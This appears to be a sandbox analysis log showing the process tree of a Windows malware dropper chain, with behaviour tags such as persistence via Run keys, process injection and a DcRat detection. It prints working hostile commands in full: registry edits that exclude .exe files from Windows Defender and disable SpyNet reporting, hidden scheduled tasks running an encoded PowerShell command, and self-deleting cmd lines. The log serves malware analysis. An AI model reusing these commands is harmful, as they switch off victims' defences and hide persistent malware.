C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\rv2QN3DV.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\rv2QN3DV.exe4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\vj5yq2nu.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\vj5yq2nu.exe5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\Zt7xh7mZ.exeC:\Users\Admin\AppData\Local\Temp\IXP006.TMP\Zt7xh7mZ.exe6⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\ns8YA3si.exeC:\Users\Admin\AppData\Local\Temp\IXP007.TMP\ns8YA3si.exe7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\2pr394Rk.exeC:\Users\Admin\AppData\Local\Temp\IXP008.TMP\2pr394Rk.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\a\RBY2.exe"C:\Users\Admin\AppData\Local\Temp\a\RBY2.exe"3⤵
-
C:\Users\Admin\Pictures\1UP2gdrATAZBupNZSNu78zfP.exe"C:\Users\Admin\Pictures\1UP2gdrATAZBupNZSNu78zfP.exe" --silent --allusers=04⤵
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\1UP2gdrATAZBupNZSNu78zfP.exeC:\Users\Admin\Pictures\1UP2gdrATAZBupNZSNu78zfP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x68eb8538,0x68eb8548,0x68eb85545⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\1UP2gdrATAZBupNZSNu78zfP.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\1UP2gdrATAZBupNZSNu78zfP.exe" --version5⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\VoFEBuKQ1vJYt6fIH790Gt1G.exe"C:\Users\Admin\Pictures\VoFEBuKQ1vJYt6fIH790Gt1G.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\VoFEBuKQ1vJYt6fIH790Gt1G.exe"C:\Users\Admin\Pictures\VoFEBuKQ1vJYt6fIH790Gt1G.exe"5⤵
-
C:\Users\Admin\Pictures\YvCsXO45zeYgnuBJ4hTdAG77.exe"C:\Users\Admin\Pictures\YvCsXO45zeYgnuBJ4hTdAG77.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\YvCsXO45zeYgnuBJ4hTdAG77.exe"C:\Users\Admin\Pictures\YvCsXO45zeYgnuBJ4hTdAG77.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\cdgfJARe0oFv004L4sk8jEhI.exe"C:\Users\Admin\Pictures\cdgfJARe0oFv004L4sk8jEhI.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\cdgfJARe0oFv004L4sk8jEhI.exe" & exit5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\pWPZ9j9Rd0VAJsIGap1LrraB.exe"C:\Users\Admin\Pictures\pWPZ9j9Rd0VAJsIGap1LrraB.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\Pictures\pWPZ9j9Rd0VAJsIGap1LrraB.exe"C:\Users\Admin\Pictures\pWPZ9j9Rd0VAJsIGap1LrraB.exe"5⤵
-
C:\Users\Admin\Pictures\zvQ5Pd51kDhK89Tp3KaUnaKs.exe"C:\Users\Admin\Pictures\zvQ5Pd51kDhK89Tp3KaUnaKs.exe"4⤵
- Checks computer location settings
- Drops file in System32 directory
-
C:\Users\Admin\Pictures\OuIIwyyvduzVH4GZDclXi9j9.exe"C:\Users\Admin\Pictures\OuIIwyyvduzVH4GZDclXi9j9.exe"4⤵
-
C:\Users\Admin\Pictures\kg4K3lXM1MNf0nloV8774dvw.exe"C:\Users\Admin\Pictures\kg4K3lXM1MNf0nloV8774dvw.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP011.TMP\arriveprospect.exe5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP011.TMP\arriveprospect.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP011.TMP\arriveprospect.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\arriiveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP011.TMP\arriiveprospect.exe5⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe6⤵
-
C:\Users\Admin\Pictures\ZuvublF1ICgkrsEQSrV13I9m.exe"C:\Users\Admin\Pictures\ZuvublF1ICgkrsEQSrV13I9m.exe"4⤵
-
C:\Users\Admin\Pictures\BG5LNNDK5ar8cSCoPSSz3tfN.exe"C:\Users\Admin\Pictures\BG5LNNDK5ar8cSCoPSSz3tfN.exe"4⤵
-
C:\Users\Admin\Pictures\C81vjjQFIGYTH2Eyj70n71jL.exe"C:\Users\Admin\Pictures\C81vjjQFIGYTH2Eyj70n71jL.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7F34.tmp\Install.exe.\Install.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AAD.tmp\Install.exe.\Install.exe /embdidylQsC "385121" /S6⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmBwiGxXV" /SC once /ST 04:02:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmBwiGxXV"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmBwiGxXV"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\KIdWkoI.exe\" 3Y /iXsite_idhhU 385121 /S" /V1 /F7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bwpFiyeZPJPVdaMxTt"7⤵
-
C:\Users\Admin\Pictures\gz6EtambgOj5CBnSDCFRFH6W.exe"C:\Users\Admin\Pictures\gz6EtambgOj5CBnSDCFRFH6W.exe"4⤵
-
C:\Users\Admin\Pictures\gz6EtambgOj5CBnSDCFRFH6W.exe"C:\Users\Admin\Pictures\gz6EtambgOj5CBnSDCFRFH6W.exe"5⤵
-
C:\Users\Admin\Pictures\cKPOvTz9EaNN9dO5uKWTgCS2.exe"C:\Users\Admin\Pictures\cKPOvTz9EaNN9dO5uKWTgCS2.exe"4⤵
-
C:\Users\Admin\Pictures\Puk69Y2FJUEIfP2I9swhqSVj.exe"C:\Users\Admin\Pictures\Puk69Y2FJUEIfP2I9swhqSVj.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP025.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP025.TMP\arriveprospect.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP025.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP025.TMP\arriveprospect.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\IXP025.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP025.TMP\arriveprospect.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP025.TMP\arriiveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP025.TMP\arriiveprospect.exe5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe6⤵
-
C:\Users\Admin\Pictures\5rH8tso4XEuEkdWiI267EkuX.exe"C:\Users\Admin\Pictures\5rH8tso4XEuEkdWiI267EkuX.exe"4⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\5rH8tso4XEuEkdWiI267EkuX.exe" & exit5⤵
-
C:\Users\Admin\Pictures\WohIIj51u9XcweyDzfEPcc5n.exe"C:\Users\Admin\Pictures\WohIIj51u9XcweyDzfEPcc5n.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\ybgaerhz4bvm5Q5IQXZldWS6.exe"C:\Users\Admin\Pictures\ybgaerhz4bvm5Q5IQXZldWS6.exe"4⤵
-
C:\Users\Admin\Pictures\HzV3uxUCJV0GdKXmZ3vlqs9I.exe"C:\Users\Admin\Pictures\HzV3uxUCJV0GdKXmZ3vlqs9I.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\D1SasetWTzdnGfgHaxvWTZwL.exe"C:\Users\Admin\Pictures\D1SasetWTzdnGfgHaxvWTZwL.exe" --silent --allusers=04⤵
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\D1SasetWTzdnGfgHaxvWTZwL.exeC:\Users\Admin\Pictures\D1SasetWTzdnGfgHaxvWTZwL.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x67e48538,0x67e48548,0x67e485545⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\D1SasetWTzdnGfgHaxvWTZwL.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\D1SasetWTzdnGfgHaxvWTZwL.exe" --version5⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\cn0z4QFPPrVwC6o3i2gTdY6r.exe"C:\Users\Admin\Pictures\cn0z4QFPPrVwC6o3i2gTdY6r.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\IrRerbPVdmpemgSDMccipRI8.exe"C:\Users\Admin\Pictures\IrRerbPVdmpemgSDMccipRI8.exe"4⤵
-
C:\Users\Admin\Pictures\GNoMTFliZybEFkxcNFHxxZLc.exe"C:\Users\Admin\Pictures\GNoMTFliZybEFkxcNFHxxZLc.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7023.tmp\Install.exe.\Install.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS718A.tmp\Install.exe.\Install.exe /embdidylQsC "385121" /S6⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMkUERgHA" /SC once /ST 09:36:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMkUERgHA"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMkUERgHA"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\JrmZuEh.exe\" 3Y /XDsite_idfXS 385121 /S" /V1 /F7⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\ioGX17ch9dinghQISJzxcKVo.exe"C:\Users\Admin\Pictures\ioGX17ch9dinghQISJzxcKVo.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\tRKVOtjecrrNZtmJmfuB5GtT.exe"C:\Users\Admin\Pictures\tRKVOtjecrrNZtmJmfuB5GtT.exe"4⤵
-
C:\Users\Admin\Pictures\UvERwrJE4J4f2I7vOhhmQafk.exe"C:\Users\Admin\Pictures\UvERwrJE4J4f2I7vOhhmQafk.exe"4⤵
-
C:\Users\Admin\Pictures\UvERwrJE4J4f2I7vOhhmQafk.exe"C:\Users\Admin\Pictures\UvERwrJE4J4f2I7vOhhmQafk.exe"5⤵
-
C:\Users\Admin\Pictures\8aqbEbjCG5QJ904aFlH7v1yT.exe"C:\Users\Admin\Pictures\8aqbEbjCG5QJ904aFlH7v1yT.exe"4⤵
-
C:\Users\Admin\Pictures\rIRINXTHqMfix1bUeIa22dKi.exe"C:\Users\Admin\Pictures\rIRINXTHqMfix1bUeIa22dKi.exe"4⤵
-
C:\Users\Admin\Pictures\W9OWUobA4mvotPfkxGiGm1gM.exe"C:\Users\Admin\Pictures\W9OWUobA4mvotPfkxGiGm1gM.exe"4⤵
-
C:\Users\Admin\Pictures\oizrXFoNu86WxqYx3N32iFz4.exe"C:\Users\Admin\Pictures\oizrXFoNu86WxqYx3N32iFz4.exe" --silent --allusers=04⤵
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\oizrXFoNu86WxqYx3N32iFz4.exeC:\Users\Admin\Pictures\oizrXFoNu86WxqYx3N32iFz4.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2bc,0x2c0,0x2c4,0x298,0x2c8,0x66108538,0x66108548,0x661085545⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\oizrXFoNu86WxqYx3N32iFz4.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\oizrXFoNu86WxqYx3N32iFz4.exe" --version5⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\5LiZ62DcucSib5zeQBW0X0Qx.exe"C:\Users\Admin\Pictures\5LiZ62DcucSib5zeQBW0X0Qx.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriiveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriiveprospect.exe5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe6⤵
-
C:\Users\Admin\Pictures\Y69IKRfvg7aNONVRVK04AX4E.exe"C:\Users\Admin\Pictures\Y69IKRfvg7aNONVRVK04AX4E.exe"4⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Y69IKRfvg7aNONVRVK04AX4E.exe" & exit5⤵
-
C:\Users\Admin\Pictures\65UX6HV2zRfsRiEJBWFHv8xJ.exe"C:\Users\Admin\Pictures\65UX6HV2zRfsRiEJBWFHv8xJ.exe"4⤵
-
C:\Users\Admin\Pictures\GzljkFq7VQr92EiD4jNdNltW.exe"C:\Users\Admin\Pictures\GzljkFq7VQr92EiD4jNdNltW.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8950.tmp\Install.exe.\Install.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSE6DC.tmp\Install.exe.\Install.exe /embdidylQsC "385121" /S6⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTawooVht" /SC once /ST 11:06:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTawooVht"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTawooVht"7⤵
-
C:\Users\Admin\Pictures\s1Gupzr1zCFrhipr6uzLRUmI.exe"C:\Users\Admin\Pictures\s1Gupzr1zCFrhipr6uzLRUmI.exe"4⤵
-
C:\Users\Admin\Pictures\k51dnjNlAxSt9PYSbkgXHKVA.exe"C:\Users\Admin\Pictures\k51dnjNlAxSt9PYSbkgXHKVA.exe" --silent --allusers=04⤵
- Enumerates connected drives
-
C:\Users\Admin\Pictures\k51dnjNlAxSt9PYSbkgXHKVA.exeC:\Users\Admin\Pictures\k51dnjNlAxSt9PYSbkgXHKVA.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x27c,0x2c0,0x67e48538,0x67e48548,0x67e485545⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\k51dnjNlAxSt9PYSbkgXHKVA.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\k51dnjNlAxSt9PYSbkgXHKVA.exe" --version5⤵
-
C:\Users\Admin\Pictures\m13qN50tEvzoVxl3UYdxKewq.exe"C:\Users\Admin\Pictures\m13qN50tEvzoVxl3UYdxKewq.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\arriveprospect.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\arriveprospect.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\arriiveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\arriiveprospect.exe5⤵
-
C:\Users\Admin\Pictures\VbALe02isaQFWNeBmEzXaE3W.exe"C:\Users\Admin\Pictures\VbALe02isaQFWNeBmEzXaE3W.exe"4⤵
-
C:\Users\Admin\Pictures\KbSwbzzJhKetdwQb6Sd2N5YV.exe"C:\Users\Admin\Pictures\KbSwbzzJhKetdwQb6Sd2N5YV.exe"4⤵
-
C:\Users\Admin\Pictures\aqDsaAIsfr6cJiOPcx60dIh4.exe"C:\Users\Admin\Pictures\aqDsaAIsfr6cJiOPcx60dIh4.exe"4⤵
-
C:\Users\Admin\Pictures\cuDPejF9GkT81pJAYlSsRgTR.exe"C:\Users\Admin\Pictures\cuDPejF9GkT81pJAYlSsRgTR.exe"4⤵
-
C:\Users\Admin\Pictures\1z1cTfEFIOtuZiYbM7ywmlkq.exe"C:\Users\Admin\Pictures\1z1cTfEFIOtuZiYbM7ywmlkq.exe"4⤵
-
C:\Users\Admin\Pictures\T2Efl6OSa8CaL1LBEMj9Ubhj.exe"C:\Users\Admin\Pictures\T2Efl6OSa8CaL1LBEMj9Ubhj.exe"4⤵
-
C:\Users\Admin\Pictures\T2Efl6OSa8CaL1LBEMj9Ubhj.exe"C:\Users\Admin\Pictures\T2Efl6OSa8CaL1LBEMj9Ubhj.exe"5⤵
-
C:\Users\Admin\Pictures\hQC2qIdTEZrP9JShCm2EaAcq.exe"C:\Users\Admin\Pictures\hQC2qIdTEZrP9JShCm2EaAcq.exe"4⤵
-
C:\Users\Admin\Pictures\PsaxNKTLhDc8W8oDhWU868yI.exe"C:\Users\Admin\Pictures\PsaxNKTLhDc8W8oDhWU868yI.exe" --silent --allusers=04⤵
-
C:\Users\Admin\Pictures\Wrvo1RRODYPN7KvqpWbfO5Jt.exe"C:\Users\Admin\Pictures\Wrvo1RRODYPN7KvqpWbfO5Jt.exe"4⤵
-
C:\Users\Admin\Pictures\I7RfX6oIZklYi6bOHsuLjY9j.exe"C:\Users\Admin\Pictures\I7RfX6oIZklYi6bOHsuLjY9j.exe"4⤵
-
C:\Users\Admin\Pictures\0wis7LCpPkBw47UPIHnr9nvA.exe"C:\Users\Admin\Pictures\0wis7LCpPkBw47UPIHnr9nvA.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\source2.exe"C:\Users\Admin\AppData\Local\Temp\a\source2.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe"C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe"C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe"3⤵
- Adds Run key to start application
-
C:\Windows\SYSTEM32\cmd.execmd /c difficspec.bat4⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\difficultspecific.exeC:\Users\Admin\AppData\Local\Temp\IXP009.TMP\difficultspecific.exe4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\callcustomerpro.exeC:\Users\Admin\AppData\Local\Temp\IXP020.TMP\callcustomerpro.exe5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\callcustomer.exeC:\Users\Admin\AppData\Local\Temp\IXP022.TMP\callcustomer.exe6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\callcustomer.exeC:\Users\Admin\AppData\Local\Temp\IXP022.TMP\callcustomer.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\calllcustomer.exeC:\Users\Admin\AppData\Local\Temp\IXP022.TMP\calllcustomer.exe6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe7⤵
-
